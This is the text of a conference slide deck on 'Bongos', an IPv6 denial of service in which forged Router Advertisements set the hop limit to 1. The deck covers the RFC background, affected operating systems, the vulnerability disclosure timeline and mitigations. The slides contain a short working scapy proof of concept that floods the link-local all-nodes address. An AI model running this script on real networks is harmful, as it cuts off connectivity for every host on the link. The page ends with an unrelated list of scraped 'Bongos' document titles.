Bongos - Modio2015-07-31 Africahackon Simple (IPv6) Denial of Service Attack Cross platform Simple...

www.modio.se2015-07-31 Africahackon

BongosIt’s not the end of the Internet

https://www.bongos.se/

IPv6 at iHubiHub 1 and 2 has functional ipv6

https://ipv6.google.com/ - test

unix/Linux: ping6 ipv6.google.com

windows ping -t ipv6.google.com

iOS/Android: Apps.

● Simple (IPv6) Denial of Service Attack○ Cross platform

● Simple to Exploit○ Link Local

Bongos: What is it

IPv6: Some details

Things you need to know

IPv6: Some details

Routing basics

IPv6: Hop Limit

TTL in IPv4 was renamedHop Limit in IPv6

IPv6: Hop Limit

All routers decrease hop limit by 1reject if 0

IPv6: Neighbour Discovery

Things you need to know

IPv6: Neighbour Discovery

Client & Router

IPv6: Neighbour Discovery(short & incorrect)

Client: Asks for routesRouter: Advertises routes

IPv6: Router Advertisement

ICMP Type ICMP Code Checksum

Cur Hop limit M|O|Reserved Router Lifetime

Reachable time

Retrans timer

Options

IPv6: Router Advertisement

ICMP Type ICMP Code Checksum

Cur Hop limit M|O|Reserved Router Lifetime

Reachable time

Retrans timer

Options

IPv6: Quoth the RFC

“If the received Cur Hop Limit value is non-zero, the host SHOULD set its CurHopLimit variable to the received value.”

IPv6: But...

What if there’s nothing else in the Router Advertisement?

Exploit

Let’s see what happens!

Exploit: bongos.py

#!/bin/env python

import scapy.all

from scapy.layers.inet6 import *

ip = IPv6()

icmp = ICMPv6ND_RA()

Exploit: bongos.py

ip.dst = "ff02::1"

icmp.chlim = 1

send(ip/icmp, loop=True,inter=1)

Exploit: And then what?

Clients see RA packet and Apply the Hop Limit

Impact

Hop Limit is per interface

Impact

Hop Limit is suddenly 1

Impact

Hop Limit is suddenly 1

Globally

Impact

All outgoing packets get dropped at first router

Impact: Operating Systems Linux

( Android, RHEL, SuSE…) FreeBSD

( Juniper, PFSense) Apple OS X Apple iOS Microsoft Windows 8.x

Impact: Protection

RFC 3756:“….ignore very small hop limits.”

Reporting

Then what?

Reporting

Vendor sec / OSS sec

Reporting

CERT/CC!

Reporting

With patch!

Reporting

And PoC!

Reporting

Then silence

Reporting

45 days disclosure timeline

Reporting

Question about upstream

Reporting

OK to post patches!( 2 weeks )

Reporting

Patches are public( woups )

Reporting

Instant disclosure by CERT

Reporting

CVE request

Reporting

It’s all open

Patch your OS:● Linux● BSD

Impact: Fixes

Patch your OS:● Android?● Apple?● Others?

Impact: Fixesworkarounds

Filter out RA packets● Switches● Firewalls● Wifi access points

Suspicious RA packets● Local firewall

Bongos: Recap

● Link Local● Cross Platform● Easy● Reporting still sucks

Questions?

https://www.bongos.se/

Bongos - Modio2015-07-31 Africahackon Simple (IPv6) Denial of Service Attack Cross platform Simple...

Documents

The Best Salsa Sounds · SALSA instrument with the correct instrument name as listed below. congas marimbas bongos maracas tambourine trumpet

Zoo de la Palmyre · Bongos Lycaons Oryx algazelle Lémurs aux yeux turquoise Pandas roux SINGERIE : Lémuriens SINGERIE : Ouistitis, Tamarins Guépards Mandrills Rhinocéros, Zèbres

Plaatjes afdrukken - dmpscores.s3.amazonaws.comdmpscores.s3.amazonaws.com/pdf/zmmn-10/zmmn-10.pdf · Timbales Bongos claves Marimba Congas Claves Drum Set Timpani Tubular Bells susv

Bongos and Congas - namm.org · Bongos and Congas Congas Sabor Come in 3 sizes: The Quinto 8”, The Conga 10” and The Tumbadora 12”. They stand at 22” high (ideal for children)

La Fiesta Se Calienta · Keyboard / Guitar (optional) Bass Guitar (optional) Bongos Tambourine Cabasa Drums Print & Listen Drucken & Anhören Imprimer & Ecouter . DISCOGRAPHY Zu bestellen

petelockett.competelockett.com/lessons/POP PERCUSSION TUTORIALS/POP PERCUS… · Basic set-up congas/bongos cymbals RACK 1 mounted INSTRUMENTS: Tambourine Shaker Multi-guiro Cabassa

The Musical - Carolina · PDF fileElisabeth Waldstein ... team a bucket full of water. ... Bongos are used in the score for the musical, CURIOUS GEORGE

INTERNET SAFETY FOR CHILDREN - Africahackon€¦ · Predators Trick children to do various negative things ADVANTAGES DISADVANTAGES. DANGERS ON THE INTERNET Hacking Phishing Cyber

· PDF fileDAFTAR LAPORAN PENERIMAAN SUMBANGAN DANA KAMPANYE ... Nama penyumbang . Jupri anto, S.Sí. Bongos I RT 01 Gadingsari, Alamat penyumbang

BONGOS STEEL 40 KBQ MOBILE KITCHENS · Due robuste ruote rendono il BONGOS facilmente trasportabile anche su terreni impegnativi. bruciatore Paellero piano 2 fuochi Potenza complessiva

EMR 19960 Caribbean Cocktail€¦ · Piano / Keyboard / Guitar String Bass / Bass Guitar Xylophone (optional) Bongos (optional) Guiro (optional) Cowbell (optional) Drums Print & Listen

BONGOS Professional MOBILE KITCHENSTwo sturdy wheels make BONGOS easily transportable on the most difficult surfaces. It is designed for water (inflow/outflow), gas and electric connections

Straight Ahead Samples - Straight Ahead! Bongos & Congas Ahead Samples… · Bongos & Congas is supplied under a formal license agreement that you enter into when you install Straight

Bongos, champanes y vapores en la navegación fluvial

BASS DRUMBASS DRUM SPECIAL TIP: MicrophoneBass Drum Snare Drum Tom-Toms Cymbals Hi-Hat Bongos/Congas Perception Perception Perception preferred recommended RECORDING BEILAGE_MicroGuide9th

Bagels, Bongos, and Yiddishe Mambos

THURSDAY, FEBRUARY 10, 2005 ONTHEVERGEOFTHEWEEKEND PAGE … · THURSDAY, FEBRUARY 10, 2005 ONTHEVERGEOFTHEWEEKEND PAGE 5B ... Meade has been playing guitar ... to introduce bongos

Bouncin’ Bongos - Mattel · Bouncin’ Bongos™ C7324 Instructions Please keep this instruction sheet for future reference, as it contains important information. Requires three

Daniela Casavantes 203 BONGOS

DMPdmpscores.s3.amazonaws.com/pdf/cmt-03/cmt-03.pdf · timbales cymbal cowbell bongos congas maracas cowbell bongo's congas maracas cowbell bongos congr maracas deel il (montuno)